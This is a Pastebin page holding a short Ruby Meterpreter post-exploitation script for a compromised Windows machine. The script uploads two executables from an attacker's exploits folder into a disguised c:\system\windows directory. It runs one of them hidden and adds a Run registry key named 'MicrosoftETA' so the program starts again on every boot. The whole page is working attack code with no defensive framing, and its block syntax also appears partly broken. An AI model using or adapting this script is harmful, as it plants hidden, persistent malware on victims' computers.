Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- avs = %W{
- Bot.exe
- }
- client.sys.process.get_processes().each do |x|
- if (!avs.index(x['name'].downcase))
- {
- print_status("LAUNCHING SCRIPT FROM SESSION #{client}")
- print_status("Creating directory")
- client.fs.dir.mkdir("c:\\system")
- client.fs.dir.mkdir("c:\\system\\windows")
- client.fs.file.upload_file("c:\\system\\windows\\wingrab.exe" , "/root/Desktop/exploits/Project/wingrab.exe")
- client.fs.file.upload_file("c:\\system\\windows\\winview.exe" , "/root/Desktop/exploits/Project/winview.exe")
- client.sys.process.execute("c:\\system\\windows\\wingrab.exe", nil, {'Hidden' => 'true'})
- key = "HKLM\\software\\microsoft\\windows\\currentversion\\run"
- value = "MicrosoftETA"
- data = "c:\\system\\windows\\wingrab.exe"
- type = "REG_SZ"
- root_key, base_key = client.sys.registry.splitkey(key)
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_line("Successful")
- }
- end
- else
- print("Process running...")
- end
Add Comment
Please, Sign In to add comment
